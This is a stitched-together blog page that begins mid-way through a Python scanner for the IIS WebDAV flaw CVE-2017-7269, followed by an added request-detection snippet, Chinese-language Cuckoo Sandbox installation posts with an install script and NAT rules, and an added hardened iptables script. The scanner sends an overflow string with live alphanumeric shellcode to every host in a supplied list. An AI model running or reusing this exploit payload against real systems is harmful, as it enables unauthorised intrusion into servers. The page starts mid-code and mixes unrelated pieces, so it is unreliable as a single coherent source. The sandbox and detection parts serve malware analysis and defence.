        pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
        shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N10WRJLMSSI7LNR72JPTKOXPQ3PV0ENM02NPNQNWNMNWOBNVP9KPOS2O2NT4S52N44NMB4RYD0C5OJMPBTQURX44NORH2TRMBLLMKZPCRORNSDQU2N2TNMPL1URN2GT4S8OJOBOFMPLMKZLMLJOXOX1924MPOSPV0ENMNRP0NQNWNMOGNROFP9O01CRU3333RET3SCM0M0A'
        pay+=shellcode
        pay+='>\r\n\r\n'
 
        self.sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sk.settimeout(10)
        data = ""
        try:
            self.sk.connect((self.host, self.port))
            self.sk.send(pay)
            data = self.sk.recv(80960)
        except Exception, err:
            pass
            #self.status = str(err)
        else:
            #self.status = "connected"
            if not -1==data.find('HHIT CVE-2017-7269 Success') :
                print "Found Vulnerable on Host : "+self.host
                with open("CVE-2017-Check.log", "a") as ff:
                    ff.write("Found Vulnerable on Host : "+self.host+"\n")
        finally:
            self.sk.close()


def get_hostnames_list(filename):
    return open(filename).read().splitlines()

if (__name__ == "__main__"):
    hostnames_file = sys.argv[1]
    hosts_list = get_hostnames_list(hostnames_file)
    threads = []
    for host in hosts_list:
        ##time.sleep(1)
        thread = Scanner(host, 80)
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()
        print "Host: ", thread.host, " : ", thread.status
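A defender-side complement, added here and not part of the original post: the checker above depends on a PROPFIND request whose If header carries an oversized, non-ASCII resource token, and this Python snippet flags raw HTTP requests with that shape so a WAF rule, IDS signature or proxy log review can catch the probe. Both sample requests are constructed (the long token is filler bytes, not the page's payload), and the length threshold is an assumption.

```python
# Constructed HTTP requests: a normal WebDAV PROPFIND and one shaped like the
# CVE-2017-7269 probe (PROPFIND with an oversized, non-ASCII <...> token in If).
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: localhost\r\nDepth: 1\r\n"
          b"If: <http://localhost/docs/> (<opaquelocktoken:abc>)\r\n\r\n")
SUSPECT = (b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
           b"If: <http://localhost/aaaaaaa" + b"\xe6\xbd\xa8" * 120 + b">\r\n\r\n")

# Assumed threshold for this example: legitimate If tokens are a lock token or a
# resource URL, far shorter than the overflow string the checker sends.
MAX_TOKEN_LEN = 128


def parse_headers(raw):
    """Return (method, [(name, value), ...]) for a raw request; repeated headers are kept."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].upper()
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return method, headers


def if_header_tokens(value):
    """Extract the contents of every <...> token in an If header value.

    An unterminated token (no closing '>') is returned as-is so that a truncated
    or deliberately malformed header is still examined rather than ignored.
    """
    tokens = []
    start = 0
    while True:
        lt = value.find(b"<", start)
        if lt < 0:
            return tokens
        gt = value.find(b">", lt)
        if gt < 0:
            tokens.append(value[lt + 1:])
            return tokens
        tokens.append(value[lt + 1:gt])
        start = gt + 1


def classify_request(raw):
    """Return the reasons a request resembles a CVE-2017-7269 probe (empty list = clean)."""
    method, headers = parse_headers(raw)
    reasons = []
    if method != b"PROPFIND":
        return reasons
    for name, value in headers:
        if name != b"if":
            continue
        for tok in if_header_tokens(value):
            if len(tok) > MAX_TOKEN_LEN:
                reasons.append("If token of %d bytes exceeds %d" % (len(tok), MAX_TOKEN_LEN))
            if any(b > 0x7f for b in tok):
                reasons.append("non-ASCII bytes in If token")
    return reasons


if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, classify_request(req) or "clean")
```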


Friday, March 24, 2017

How to Install Cuckoo Sandbox? [Step3]

Configuration

Step1: Modify Cuckoo's configuration and parameters

There are several config files in Cuckoo's conf directory, but only a few basic settings are needed:

First edit reporting.conf
[jsondump]
enabled = yes <== change no to yes
indent = 4
encoding = latin-1
calls = yes

[reporthtml]
enabled = yes <== change no to yes

[mongodb]
enabled = yes  <== change no to yes
host = 127.0.0.1
port = 27017
db = cuckoo
store_memdump = yes
paginate = 100

Next edit virtualbox.conf
[cuckoo1]
label = Win7_32 <== the VM's name

Step2: Start Cuckoo and the web interface

1) In the cuckoo directory, run ./cuckoo.py

2) In the cuckoo\web directory, run ./manage.py runserver



Step3: Upload a malware sample to test

First download a sample from a malware sharing site to test with

Open Firefox and enter 127.0.0.1:8000

You can see the upload succeeded and analysis has started

When the analysis finishes, the page shows reported; click the sample's MD5 field to view the analysis report

That is my own test and install process; feel free to try it.

How to Install Cuckoo Sandbox? [Step2]

Install VirtualBox on Windows 7

1. Install Windows 7 OS (Don't Update !)

2.Install Office 2003 or 2010 (Don't Update !)

3.Install AdbeRdr9.exe (Don't Update !)

4.Install flash-player9.msi  (Don't Update !) 

5. Disable the firewall and UAC

6. Disable the [OS][Office][Adobe] auto-update functions


7. Install Python 2.7 (make sure to add python to the OS PATH environment variable)


9. Install Cuckoo's agent.py into the Startup folder, renaming agent.py to agent.pyw
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


10. Disable network active probing
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NlaSvc\Parameters\Internet
Change EnableActiveProbing from 1 to 0

 


11. Disable the Teredo IPv6 Tunneling feature in Microsoft Windows
Open a command prompt with administrator privileges
(Start->Accessories->right click on Command Prompt,
choose Run as Administrator):
C:\netsh interface teredo set state disabled [Enter]
 

12. Set up the network environment
1) On Ubuntu, go to the cuckoo directory and run sudo ./update_ip_tables.sh



2) On Ubuntu, open VirtualBox's network settings and add a Host-Only network interface [vboxnet0]

3) On Ubuntu, open the VM's network settings and use the Host-Only network interface [vboxnet0]

The VM's network settings are as shown in the figure below


4) Test that networking between Ubuntu and the VM works
 ubuntu:  Ping 192.168.56.101
 vm: Ping 192.168.56.1
        Ping www.google.com



5) Once the VM's settings and tests are all fine, save a [snapshot] of the VM <== very important, very important, very important




How to Install Cuckoo Sandbox? [Step1]

Install All Packages dependencies and libraries

Step1: update

$ sudo apt-get update 


Step2: Install the dependencies and libraries

$ sudo apt-get install -y python python-pip python-dev python-sqlalchemy python-dpkt python-jinja2 python-magic python-pymongo python-libvirt subversion git build-essential git libpcre3 libpcre3-dev libpcre++-dev python-bottle libffi-dev libssl-dev libxml2-dev libxslt-dev libxslt1-dev libjpeg-dev libfuzzy-dev ssdeep  autoconf automake libtool make gcc 


Step3: Upgrade pip (pip-9.0.1-py2.py3-none-any.whl)

$ sudo pip install --upgrade pip
$ sudo pip install -U pip setuptools


Step4: Install the pefile Python Module

$ wget https://github.com/erocarrera/pefile/files/192316/pefile-2016.3.28.tar.gz
$ tar zxvf pefile-2016.3.28.tar.gz
$ cd pefile-2016.3.28/
$ sudo python setup.py build
$ sudo python setup.py install
$ cd ..


Step5: Install the pydeep Python Module

$ git clone https://github.com/kbandla/pydeep.git pydeep
$ cd pydeep
$ sudo python setup.py build
$ sudo python setup.py install
$ cd ..


Step6: Install jansson-2.10

$ wget http://www.digip.org/jansson/releases/jansson-2.10.tar.gz
$ tar zxvf jansson-2.10.tar.gz
$ cd jansson-2.10/
$ ./configure
$ make
$ sudo make install
$ cd ..


Step7: Install swig-3.0.12

$ wget http://downloads.sourceforge.net/swig/swig-3.0.12.tar.gz
$ tar zxvf swig-3.0.12.tar.gz
$ cd swig-3.0.12/
$ ./configure
$ make
$ sudo make install
$ cd ..



Step8: Install M2Crypto==0.24.0

$ wget https://pypi.python.org/packages/58/75/362faac80a1bc2742b4b696dc350518312043d568bfd2687a9270f18da88/M2Crypto-0.24.0.tar.gz#md5=8e87235942c76d1ba9f999ee33764fdb
$ tar zxvf M2Crypto-0.24.0.tar.gz
$ cd M2Crypto-0.24.0/
$ sudo python setup.py build
$ sudo python setup.py install
$ cd ..



Step9: Install YARA 3.5

$ sudo apt-get install -y flex bison
$ wget https://github.com/VirusTotal/yara/archive/v3.5.0.tar.gz
$ tar xvfz v3.5.0.tar.gz
$ cd yara-3.5.0/
$ ./bootstrap.sh
$ ./configure --enable-cuckoo --enable-magic
$ make
$ sudo make install



Step10: Install Tcpdump

$ sudo apt-get -y install tcpdump libpcap-dev
$ sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
$ getcap /usr/sbin/tcpdump


Step11:  "Create ip_tables.sh"

$ echo '#!/bin/bash' >update_ip_tables.sh
$ echo 'iptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT' >> update_ip_tables.sh
$ echo 'iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT' >> update_ip_tables.sh
$ echo 'iptables -A POSTROUTING -t nat -j MASQUERADE' >> update_ip_tables.sh
$ echo 'sysctl -w net.ipv4.ip_forward=1' >> update_ip_tables.sh
$ chmod +x ./update_ip_tables.sh
$ sudo ./update_ip_tables.sh


Step12:  "Install Dnsmasq"
$ sudo apt-get install -y dnsmasq
$ sudo service dnsmasq start


Step13: "Install volatility, MongoDB, tesseract-ocr"
$ sudo apt-get install -y volatility mongodb tesseract-ocr



Step 14: "Install Cuckoo Sandbox"
$ git clone https://github.com/cuckoosandbox/cuckoo


Step 15:  "Install Cuckoo Sandbox requirement modules"
$ cd cuckoo/
$ sudo -H pip install -r requirements.txt


Step16: "Install Cuckoo Sandbox utilities"
$ cd utils/
$ ./community.py -a -f -w



Step17:  "Install Oracle VM VirtualBox"
$ sudo sh -c 'echo "deb http://download.virtualbox.org/virtualbox/debian xenial contrib" >> /etc/apt/sources.list.d/virtualbox.list'
$ wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
$ wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -
$ sudo apt update && sudo apt-get -y install virtualbox-5.1


Step18: "Install Oracle VM VirtualBox Extension Pack"
$ wget http://download.virtualbox.org/virtualbox/5.1.18/Oracle_VM_VirtualBox_Extension_Pack-5.1.18-114002.vbox-extpack
$ VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-5.1.18-114002.vbox-extpack



Step19: "Add cuckoo to the vboxusers group"
$ sudo usermod -aG vboxusers cuckoo


========================================================================
install.sh
#!/bin/bash

# Work from $HOME: later sections return with "cd ~" and then "cd install_tmp/",
# so the temporary directory must live directly under the home directory.
cd ~ || exit 1
mkdir -p install_tmp
cd install_tmp/ || exit 1

echo "====================================="
echo "Ubuntu Packages Update"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get update 

echo "====================================="
echo "Install the dependencies and libraries"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get install -y python python-pip python-dev python-sqlalchemy python-dpkt python-jinja2 python-magic python-pymongo python-libvirt subversion git build-essential git libpcre3 libpcre3-dev libpcre++-dev python-bottle libffi-dev libssl-dev libxml2-dev libxslt-dev libxslt1-dev libjpeg-dev libfuzzy-dev ssdeep  autoconf automake libtool make gcc 

echo ""
echo ""
echo "====================================="
echo "Upgrade pip and setuptools"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo pip install --upgrade pip
sudo pip install -U pip setuptools

echo ""
echo ""
echo "====================================="
echo "Install Pefile Python Module"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget https://github.com/erocarrera/pefile/files/192316/pefile-2016.3.28.tar.gz
tar zxvf pefile-2016.3.28.tar.gz
cd pefile-2016.3.28/
sudo python setup.py build
sudo python setup.py install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install pydeep Python Module"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
git clone https://github.com/kbandla/pydeep.git pydeep
cd pydeep
sudo python setup.py build
sudo python setup.py install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install jansson-2.10"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget http://www.digip.org/jansson/releases/jansson-2.10.tar.gz
tar zxvf jansson-2.10.tar.gz
cd jansson-2.10/
./configure
make
sudo make install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install swig-3.0.12"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget http://downloads.sourceforge.net/swig/swig-3.0.12.tar.gz
tar zxvf swig-3.0.12.tar.gz
cd swig-3.0.12/
./configure
make
sudo make install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install M2Crypto==0.24.0"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget https://pypi.python.org/packages/58/75/362faac80a1bc2742b4b696dc350518312043d568bfd2687a9270f18da88/M2Crypto-0.24.0.tar.gz#md5=8e87235942c76d1ba9f999ee33764fdb
tar zxvf M2Crypto-0.24.0.tar.gz
cd M2Crypto-0.24.0/
sudo python setup.py build
sudo python setup.py install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install YARA 3.5"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get install -y flex bison
wget https://github.com/VirusTotal/yara/archive/v3.5.0.tar.gz
tar xvfz v3.5.0.tar.gz
cd yara-3.5.0/
./bootstrap.sh
./configure --enable-cuckoo --enable-magic
make
sudo make install

cd ~

echo ""
echo ""
echo "====================================="
echo "Install Tcpdump"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get -y install tcpdump libpcap-dev
sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump

echo ""
echo ""
echo "====================================="
echo "Create update_ip_tables.sh"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
echo '#!/bin/bash' >update_ip_tables.sh
echo 'iptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT' >> update_ip_tables.sh
echo 'iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT' >> update_ip_tables.sh
echo 'iptables -A POSTROUTING -t nat -j MASQUERADE' >> update_ip_tables.sh
echo 'sysctl -w net.ipv4.ip_forward=1' >> update_ip_tables.sh
chmod +x ./update_ip_tables.sh
sudo ./update_ip_tables.sh

echo ""
echo ""
echo "====================================="
echo "Install Dnsmasq"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get install -y dnsmasq
sudo service dnsmasq start

echo ""
echo ""
echo "====================================="
echo "Install Volatility, MongoDB, tesseract-ocr"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get install -y volatility mongodb tesseract-ocr


echo ""
echo ""
echo "====================================="
echo "Install Cuckoo Sandbox"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
git clone https://github.com/cuckoosandbox/cuckoo

echo ""
echo ""
echo "====================================="
echo "Install Cuckoo Sandbox requirement modules"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
cd cuckoo/
sudo -H pip install -r requirements.txt

echo ""
echo ""
echo "====================================="
echo "Install Cuckoo Sandbox utilities"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
cd utils/
./community.py -a -f -w
echo ""
echo ""
echo "Cuckoo Sandbox Installed!"
cd ~

cd install_tmp/
echo ""
echo ""
echo "====================================="
echo "Install Oracle VM VirtualBox"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo sh -c 'echo "deb http://download.virtualbox.org/virtualbox/debian xenial contrib" >> /etc/apt/sources.list.d/virtualbox.list'
wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -
sudo apt update && sudo apt-get -y install virtualbox-5.1

echo ""
echo ""
echo "====================================="
echo "Install Oracle VM VirtualBox Extension Pack"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget http://download.virtualbox.org/virtualbox/5.1.18/Oracle_VM_VirtualBox_Extension_Pack-5.1.18-114002.vbox-extpack
VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-5.1.18-114002.vbox-extpack

cd ~
echo ""
echo ""
echo "====================================="
echo "Add cuckoo to the vboxusers group"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo usermod -aG vboxusers cuckoo
echo ""
echo ""
echo "==========================================="
echo "                Finished!!                 "
echo "==========================================="
sudo rm -fr install_tmp/
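
The update_ip_tables.sh written in Step 11, and again by the install.sh above, has two properties worth tightening on a sandbox host: it appends the same rules every time it runs (duplicating them on each re-run), and its MASQUERADE rule carries no interface or source restriction, so the host NATs any forwarded packet, not only traffic from the sandbox subnet. The script below is an added example, not the page's script and not part of Cuckoo; it keeps the page's vboxnet0 / eth0 / 192.168.56.0/24 values as defaults (overridable through the SANDBOX_IF, OUT_IF and SANDBOX_NET environment variables, which are this example's own names), scopes every rule to those interfaces, drops forwarding from the sandbox toward any other interface, and uses "iptables -C" so a rule is added only when it is not already present. The firewall is only touched when APPLY_RULES=1 is set; otherwise the file just defines the functions so it can be inspected or sourced.

```shell
#!/bin/bash
# Idempotent, interface-scoped replacement for update_ip_tables.sh (added example).
# Defaults mirror the page; these variable names are this example's own.
SANDBOX_IF="${SANDBOX_IF:-vboxnet0}"
OUT_IF="${OUT_IF:-eth0}"
SANDBOX_NET="${SANDBOX_NET:-192.168.56.0/24}"

# Print the rule set, one rule per line, as "table|chain|rule arguments".
# Order matters: the DROP rule must come after the two ACCEPT rules.
build_rules() {
    sbx_if="$1"; out_if="$2"; sbx_net="$3"
    printf '%s\n' \
      "filter|FORWARD|-i $sbx_if -o $out_if -s $sbx_net -m conntrack --ctstate NEW -j ACCEPT" \
      "filter|FORWARD|-i $out_if -o $sbx_if -d $sbx_net -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT" \
      "filter|FORWARD|-i $sbx_if ! -o $out_if -j DROP" \
      "nat|POSTROUTING|-o $out_if -s $sbx_net -j MASQUERADE"
}

# Append a rule only if "iptables -C" (check) reports it is missing, so the
# script can be re-run at every boot without stacking duplicate rules.
ensure_rule() {
    table="$1"; chain="$2"; shift 2
    if ! iptables -t "$table" -C "$chain" "$@" 2>/dev/null; then
        iptables -t "$table" -A "$chain" "$@"
    fi
}

# Apply every rule from build_rules, then enable IPv4 forwarding.
apply_rules() {
    build_rules "$SANDBOX_IF" "$OUT_IF" "$SANDBOX_NET" |
    while IFS='|' read -r table chain args; do
        # $args is left unquoted on purpose so it splits into iptables arguments.
        ensure_rule "$table" "$chain" $args
    done
    sysctl -w net.ipv4.ip_forward=1
}

# Only change the firewall when explicitly requested (run as root).
if [ "${APPLY_RULES:-0}" = "1" ]; then
    apply_rules
fi
```

Rules added this way live only in the running kernel: run the script again after a reboot (or from a boot hook) rather than relying on them to persist, and confirm the result with "sudo iptables -S FORWARD" and "sudo iptables -t nat -S POSTROUTING".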


